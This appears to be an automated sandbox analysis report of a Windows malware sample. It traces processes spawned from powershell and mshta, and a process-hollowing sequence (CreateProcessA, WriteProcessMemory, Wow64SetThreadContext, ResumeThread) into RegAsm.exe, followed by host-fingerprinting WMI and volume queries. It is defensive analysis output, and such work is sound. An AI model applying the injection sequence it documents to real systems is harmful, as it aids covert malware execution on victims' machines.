                                                                        File size:2'141'552 bytes
                                                                        MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:6
                                                                        Start time:01:52:09
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP"
                                                                        Imagebase:0x3d0000
                                                                        File size:46'832 bytes
                                                                        MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        Target ID:7
                                                                        Start time:01:52:09
                                                                        Start date:12/12/2024
                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
                                                                        Imagebase:0x790000
                                                                        File size:65'440 bytes
                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000003.1673889747.0000000005EF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_3_5ef0000_mshta.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                          • Instruction ID: 8167e0c1ddc72042953040531fd22ce99933a0980330daacfc42f833c480f54a
                                                                          • Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
                                                                          • Instruction Fuzzy Hash:

                                                                          Execution Graph

                                                                          Execution Coverage:5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:36.8%
                                                                          Total number of Nodes:19
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 9688 4ee7cc0 9690 4ee7cd8 9688->9690 9689 4ee7d5e 9690->9689 9691 4ee89c0 Wow64SetThreadContext 9690->9691 9692 4ee8b59 WriteProcessMemory 9690->9692 9693 4ee8b60 WriteProcessMemory 9690->9693 9698 4ee89c8 Wow64SetThreadContext 9690->9698 9699 4ee91e8 9690->9699 9703 4ee8dd4 9690->9703 9707 4ee8918 9690->9707 9711 4ee8910 9690->9711 9691->9690 9692->9690 9693->9690 9698->9690 9700 4ee91eb CreateProcessA 9699->9700 9702 4ee9433 9700->9702 9704 4ee8ddd CreateProcessA 9703->9704 9706 4ee9433 9704->9706 9708 4ee891b ResumeThread 9707->9708 9710 4ee8989 9708->9710 9710->9690 9712 4ee8914 ResumeThread 9711->9712 9714 4ee8989 9712->9714 9714->9690

                                                                          Control-flow Graph

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3d4938c6fa8491b9dea5f551fc584b4bbe6d3d09e98ed9ec2c753e26586b2608
                                                                          • Instruction ID: 5be2dc0408e7a3e03fc3a8e3130dd800f964898a3eabd76d64fb3773d75b2ebd
                                                                          • Opcode Fuzzy Hash: 3d4938c6fa8491b9dea5f551fc584b4bbe6d3d09e98ed9ec2c753e26586b2608
                                                                          • Instruction Fuzzy Hash: C5F18330B006198FDB14DFA9D890AAEB7B2FF89314F248559D416AB395DF31ED42CB90

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (odq$(odq$4'dq$4'dq$tPdq$tPdq
                                                                          • API String ID: 0-1395432214
                                                                          • Opcode ID: f9c4da588ca633d05c007540fb9c8684ddf88fb16f6beae5a267eac2a50f2472
                                                                          • Instruction ID: 53d5a69c1de8475f0a683d29d66dae935464252485b3f8465acc19b19c92c455
                                                                          • Opcode Fuzzy Hash: f9c4da588ca633d05c007540fb9c8684ddf88fb16f6beae5a267eac2a50f2472
                                                                          • Instruction Fuzzy Hash: F3B104B1F0421DCFCB14CF68C850AAABBA6EF85318F14C4AAD9158B681DF71DD61CB91

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                          • API String ID: 0-2509493698
                                                                          • Opcode ID: 71c6d0a4f06af1bc523404215fc3ca27b48a1941016b92ea6646181fb430ee7b
                                                                          • Instruction ID: a8f9e1b1302693c4f2c1bcd2c01c81ce8f72b270c60883329a3bfc6bf9299c0c
                                                                          • Opcode Fuzzy Hash: 71c6d0a4f06af1bc523404215fc3ca27b48a1941016b92ea6646181fb430ee7b
                                                                          • Instruction Fuzzy Hash: 7A6119B1F042198FDB258B79981027FBBAA9FC5218F24847ED805CB2C1DE32C961C7A1

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$$dq$$dq
                                                                          • API String ID: 0-328139867
                                                                          • Opcode ID: c5e23e14664e8f290dcdb12c54a0a94b57d951f236b0fd496fd0816eefc8c5e3
                                                                          • Instruction ID: 40c55248bcd0d17394235c55577035c0767f12a522fb8df9ca5723a4244b6197
                                                                          • Opcode Fuzzy Hash: c5e23e14664e8f290dcdb12c54a0a94b57d951f236b0fd496fd0816eefc8c5e3
                                                                          • Instruction Fuzzy Hash: 973107F1E0430A9FDB258B3585113BA7BA59F42258F5480BAD804CB1D2EF76C965C7A2

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$$dq$$dq
                                                                          • API String ID: 0-328139867
                                                                          • Opcode ID: 93b0204f943f3868273ad32b9c38f23afbd813b9683f0f34305143d1db901845
                                                                          • Instruction ID: 4076c7c6f5dca994701bce26d39508c5dd29b9ae9665129a8d417b7a525eb080
                                                                          • Opcode Fuzzy Hash: 93b0204f943f3868273ad32b9c38f23afbd813b9683f0f34305143d1db901845
                                                                          • Instruction Fuzzy Hash: 8A21F3F1E0420ADBDF358E258A5037A7359AF4221DF60447AD8118B2C1EFBAD5B5C762

                                                                          Control-flow Graph (rendering omitted; first block at 0x79165f0, no API calls)
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq
                                                                          • API String ID: 0-2306408947
                                                                          • Opcode ID: 392e121d47cdd7382ae70b497511c829ae42bd78f364711f502158301266bc46
                                                                          • Instruction ID: ea50f774b3867be1f2d4ada0a367ee41e039ed7214e8c804ea394ece0722bc5a
                                                                          • Opcode Fuzzy Hash: 392e121d47cdd7382ae70b497511c829ae42bd78f364711f502158301266bc46
                                                                          • Instruction Fuzzy Hash: A54153B5F0531E8FCB148B7994446AABBFABF86258F1480BFC4048B251DF32D865CB91

                                                                          Control-flow Graph (rendering omitted; first block at 0x4ee8dd4; calls CreateProcessA)
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04EE941E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 159eef390c2b2e90fbf1232488748c1f9e028a2e65cccaa1a1ec706c2f9f4509
                                                                          • Instruction ID: 9b82d4fd24bfe655f4dbbc19582500b820037bd109d41ecc53bd7518b4a3234f
                                                                          • Opcode Fuzzy Hash: 159eef390c2b2e90fbf1232488748c1f9e028a2e65cccaa1a1ec706c2f9f4509
                                                                          • Instruction Fuzzy Hash: 70A18EB1D002199FEF20CFA9C8807EDBBF2EF48314F0485A9D809A7251DB74A985CF91

                                                                          Control-flow Graph (rendering omitted; first block at 0x4ee91e8; calls CreateProcessA)
                                                                          APIs
                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 04EE941E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 4e092dccd892c8ae66cf7f1f2d8efbad78b2cce0b5cb29295df0842357ebe047
                                                                          • Instruction ID: ae423f8316cb2d1e974710a1392375bbdcd0a73f6e02ba40dcfda5288552625d
                                                                          • Opcode Fuzzy Hash: 4e092dccd892c8ae66cf7f1f2d8efbad78b2cce0b5cb29295df0842357ebe047
                                                                          • Instruction Fuzzy Hash: 33915CB1D002199FEF24CF69C8817EEBBF2FB48314F148569E809A7251DB74A985CF91

                                                                          Control-flow Graph (rendering omitted; first block at 0x4ee8b59; calls WriteProcessMemory)
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04EE8BF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: c858bcdd2680479291b11c2b4b0010d228f4ccbc146e05f6fb234d10d5523bf7
                                                                          • Instruction ID: 1596865bb6f1811db9dd6c2b872ddfc7fe92c03e8ca71a9938d17014cee6a4fc
                                                                          • Opcode Fuzzy Hash: c858bcdd2680479291b11c2b4b0010d228f4ccbc146e05f6fb234d10d5523bf7
                                                                          • Instruction Fuzzy Hash: 963158B59003499FCF10CFAAC881BEEBBF4FF48314F148429E958A7240C774A540DB94

                                                                          Control-flow Graph (rendering omitted; first block at 0x4ee89c0; calls Wow64SetThreadContext)
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04EE8A46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: 814bf5d323d36653ba6661ba94a02593bef02623fcaf341281ade815094faf95
                                                                          • Instruction ID: 28962b9811ce1524775b91d50b2ca3c545a433953d1a197eb3622721cfeaadaa
                                                                          • Opcode Fuzzy Hash: 814bf5d323d36653ba6661ba94a02593bef02623fcaf341281ade815094faf95
                                                                          • Instruction Fuzzy Hash: F6219C72D002098FDB50DFAAC4417EEBBF4EF48324F64842AD558B7240CB78A545CB95

                                                                          Control-flow Graph (rendering omitted; first block at 0x4ee8b60; calls WriteProcessMemory)
                                                                          APIs
                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 04EE8BF0
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          • Opcode ID: d8a3371dde26ec5a5bf115568177b508b383567f521fdbab272bad67f97c3686
                                                                          • Instruction ID: 9632505fd1c832a3ccb59f63d70f8bd6a8cd6c2c33d2f56eae2382c71e30ee32
                                                                          • Opcode Fuzzy Hash: d8a3371dde26ec5a5bf115568177b508b383567f521fdbab272bad67f97c3686
                                                                          • Instruction Fuzzy Hash: 2A215AB19003099FCB10CFAAC881BEEBBF4FF48310F108429E918A7340C778A940DBA5

                                                                          Control-flow Graph (rendering omitted; first block at 0x4ee89c8; calls Wow64SetThreadContext)
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04EE8A46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          • Opcode ID: d6505d72fc8f48e869b120712ecde20bd53294ea9f39815fe883317aad025483
                                                                          • Instruction ID: 09a54455f4ea7e42b4997b6da08d44f7b5b72fcfcc9f9e556ec90f6445435840
                                                                          • Opcode Fuzzy Hash: d6505d72fc8f48e869b120712ecde20bd53294ea9f39815fe883317aad025483
                                                                          • Instruction Fuzzy Hash: CA2138B1D003098FDB50DFAAC4857EEBBF4EF48324F54842AD559A7340CB78A944CBA5

                                                                          Control-flow Graph (rendering omitted; first block at 0x4ee8910; calls ResumeThread)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 523e568a00e7fb47da524e924e6bf5b8790ef97c82da2bda3e0b4dc5d0147395
                                                                          • Instruction ID: 50afa511a70d341736dcb2c814c966692ae210e1ab9c16bec5386e71f50f7222
                                                                          • Opcode Fuzzy Hash: 523e568a00e7fb47da524e924e6bf5b8790ef97c82da2bda3e0b4dc5d0147395
                                                                          • Instruction Fuzzy Hash: 0E1146B2D002498EDB24DFAAC4457AEFBF4EB88324F24841AD559B7240CB75A540CB95

                                                                          Control-flow Graph (rendering omitted; first block at 0x4ee8918; calls ResumeThread)
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1781032210.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4ee0000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          • Opcode ID: 4dd41d83003322dcd470ce937f40164f8478c2ae552733406829ed716c437662
                                                                          • Instruction ID: f985a3cd97e758cb3eac65ef44a0dc9b25fd5d4374ee047720641f411d2b50f9
                                                                          • Opcode Fuzzy Hash: 4dd41d83003322dcd470ce937f40164f8478c2ae552733406829ed716c437662
                                                                          • Instruction Fuzzy Hash: 041128B1D003498BDB20DFAAC4457AEFBF4EB88324F248419D559A7240CB75A540CB95
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 470cb7306f6b27dc53d0099223abe371f8ea6f5f5144bf31c2280285eefaf3e9
                                                                          • Instruction ID: a07c1ff06281c55c8724566ed7cf73bd9d2ce21d0e6cc8594c8a193aa4379ecd
                                                                          • Opcode Fuzzy Hash: 470cb7306f6b27dc53d0099223abe371f8ea6f5f5144bf31c2280285eefaf3e9
                                                                          • Instruction Fuzzy Hash: DB418BF17001198BCF1497BC88216AEBFB69FE171CB1084BED9099F341DA31D965C7A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1780391847.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4a0d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 840c8fb998b8aeab1117c241794b928f9d04c28a5ec929d24864fe9ed8b7be61
                                                                          • Instruction ID: aedf0fce83bb1b68cc5069049631c409492c2b9ee7058e54f11f7ddc2c545131
                                                                          • Opcode Fuzzy Hash: 840c8fb998b8aeab1117c241794b928f9d04c28a5ec929d24864fe9ed8b7be61
                                                                          • Instruction Fuzzy Hash: E201F7735043009AF7104F65F8C0B66BFA8DF41324F08C41AED4E5A1C2C778A841C6B1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1780391847.0000000004A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A0D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4a0d000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6ba23296a732b5c4f9512d4943f0d7ef8ef3096b680539d481d21d54d18650b2
                                                                          • Instruction ID: d7b6f76c29f0ec2bb9a5645e4419137a33729150a6c2e9c7d8954fbf3661808c
                                                                          • Opcode Fuzzy Hash: 6ba23296a732b5c4f9512d4943f0d7ef8ef3096b680539d481d21d54d18650b2
                                                                          • Instruction Fuzzy Hash: 81015E7240E3C05EE7128B259D94B52BFA4DF53224F18C1CBD9889F1E3C2699849C772
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$$dq$$dq$$dq
                                                                          • API String ID: 0-2509493698
                                                                          • Opcode ID: 769c6a92e73dbadaf7d4a66d0a83662253d625023c4b0f7104d1809202fed730
                                                                          • Instruction ID: a22ea3d9f09597a9ea885874e81237a3eb974d01b8c471e07481c1c8ebbfe4c2
                                                                          • Opcode Fuzzy Hash: 769c6a92e73dbadaf7d4a66d0a83662253d625023c4b0f7104d1809202fed730
                                                                          • Instruction Fuzzy Hash: 03514DB670430E8FCB25AB799810767BBAABFD1319F24C46FD505CB241DA31C861C791
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: tPdq$tPdq$$dq$$dq$$dq
                                                                          • API String ID: 0-1962496723
                                                                          • Opcode ID: 80a271680c8c4468816d581e2d36fb207fefd55e4ae09ac89684021f4d36b821
                                                                          • Instruction ID: 1aaf41f82fc6a3c6c79e9d91ed1c5cef4be25842a1965ed91026bc2d8c66eb75
                                                                          • Opcode Fuzzy Hash: 80a271680c8c4468816d581e2d36fb207fefd55e4ae09ac89684021f4d36b821
                                                                          • Instruction Fuzzy Hash: 0D517DB23082598FD7159B7DD41066BBBE9FFD1624B28847FD845CB392CA31D856C360
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$d=p$d=p$d=p
                                                                          • API String ID: 0-2215183932
                                                                          • Opcode ID: c071125bff2c7becee432aafe38a5d549b5433f8d71c56c5089318d5b2728790
                                                                          • Instruction ID: f38b1973e5acb2cb3730d13d97d64a754a2b8dfd5da59b238150a26f78dc59ac
                                                                          • Opcode Fuzzy Hash: c071125bff2c7becee432aafe38a5d549b5433f8d71c56c5089318d5b2728790
                                                                          • Instruction Fuzzy Hash: 55415CF174510EEBCF249BB584502BEB7A9AFC5328F2488ABD651CB284EF71C461C751
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$d=p$d=p$d=p
                                                                          • API String ID: 0-2215183932
                                                                          • Opcode ID: 7f93df4face07bc4226e5ec0913bf6789a047159e08f96f879eca7606f65dd98
                                                                          • Instruction ID: d636c8b9d73ca724dc6a0554e0d8a617cd65029042b61ea74457e0002cba0b9a
                                                                          • Opcode Fuzzy Hash: 7f93df4face07bc4226e5ec0913bf6789a047159e08f96f879eca7606f65dd98
                                                                          • Instruction Fuzzy Hash: 933135B2B4420ECFCF248BAD841437EB7A6AFC521DB24846AC4518B281DF73C8E1C791
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$d=p$d=p$d=p
                                                                          • API String ID: 0-2215183932
                                                                          • Opcode ID: 5496f80b58d9f9697fe930b07fa57993ecb3666b6393a77c5249aadde8111195
                                                                          • Instruction ID: 55b7037d030629d6c4ed7722b109cf00ffb7223405f1ec3825f0392b377c1f7c
                                                                          • Opcode Fuzzy Hash: 5496f80b58d9f9697fe930b07fa57993ecb3666b6393a77c5249aadde8111195
                                                                          • Instruction Fuzzy Hash: F4214CB6B0424ECFCB254A7C94932BABBA6ABD2219B24447AC511C7341DB73C8F6C751
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $dq$$dq$$dq$$dq
                                                                          • API String ID: 0-185584874
                                                                          • Opcode ID: 56e1b4b768e2fce45103562ee27c0b2ccc34def801e7e98925be84af44ef2a26
                                                                          • Instruction ID: ab5bf9b443eb43fe63ce19b3a25a60c5ccc23cc28e05399a4d3dbbe89414bdd3
                                                                          • Opcode Fuzzy Hash: 56e1b4b768e2fce45103562ee27c0b2ccc34def801e7e98925be84af44ef2a26
                                                                          • Instruction Fuzzy Hash: 522188F131438AABDB24866E9841B27B7DE9BD871DF64C43EA909CB3D1DE71C8518321
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1792333821.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7910000_powershell.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4'dq$4'dq$$dq$$dq
                                                                          • API String ID: 0-4229963660
                                                                          • Opcode ID: 6609b45cfdfef6d63b6e362b063da82810a6acdb0f97cdbe1191a5f8ad94852b
                                                                          • Instruction ID: ba2e7271eed80a8af8b67e517dfb0e1acc6ecd4ee7c6fa90426884db2a757f6c
                                                                          • Opcode Fuzzy Hash: 6609b45cfdfef6d63b6e362b063da82810a6acdb0f97cdbe1191a5f8ad94852b
                                                                          • Instruction Fuzzy Hash: 3701D86160E3D94FD72B526D28201562F765FC351472941EBC480CF6D7CD554D8683A3

                                                                          Execution Graph

                                                                          Execution Coverage:10.9%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:41.6%
                                                                          Total number of Nodes:286
                                                                          Total number of Limit Nodes:26

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem
                                                                          • String ID: $&)C$;(C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$="C$='C$S%C$b(C$#C
                                                                          • API String ID: 4116985748-628680385
                                                                          • Opcode ID: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                          • Instruction ID: ea45c71986b2e534ecec44a4126f62931ddcc8577b73b097e58ed3aa899a90b6
                                                                          • Opcode Fuzzy Hash: c4360614f8f82c5e27f19abdd04c6f864ef0af49341f313285d7bdd33a848109
                                                                          • Instruction Fuzzy Hash: 41B16FB04097818FE771DF14D48879BBBE0BBC5308F508A2EE5E89B251CBB95448CF86

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CoCreateInstance.OLE32(0044068C,00000000,00000001,0044067C), ref: 00437173
                                                                          • SysAllocString.OLEAUT32(D080DE8F), ref: 004371DB
                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437218
                                                                          • SysAllocString.OLEAUT32(9F4F9D4B), ref: 00437268
                                                                          • SysAllocString.OLEAUT32(E8D216C6), ref: 0043731A
                                                                          • VariantInit.OLEAUT32(.'()), ref: 00437385
                                                                          • VariantClear.OLEAUT32(.'()), ref: 004374E0
                                                                          • SysFreeString.OLEAUT32(?), ref: 00437504
                                                                          • SysFreeString.OLEAUT32(?), ref: 0043750A
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00437517
                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00437552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                          • String ID: !"$"#$%$.'()$.;$>C$C$p*v,${.] ${|
                                                                          • API String ID: 2573436264-264043890
                                                                          • Opcode ID: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
                                                                          • Instruction ID: 06fb3ad9466451430b31427f45de08a7eb0daa23bec53a4f5f9458ad790f981b
                                                                          • Opcode Fuzzy Hash: 7a78478979428ae9a6e1ff4e339a7a4033eb69ce9e06f36cd810f297e7b98f92
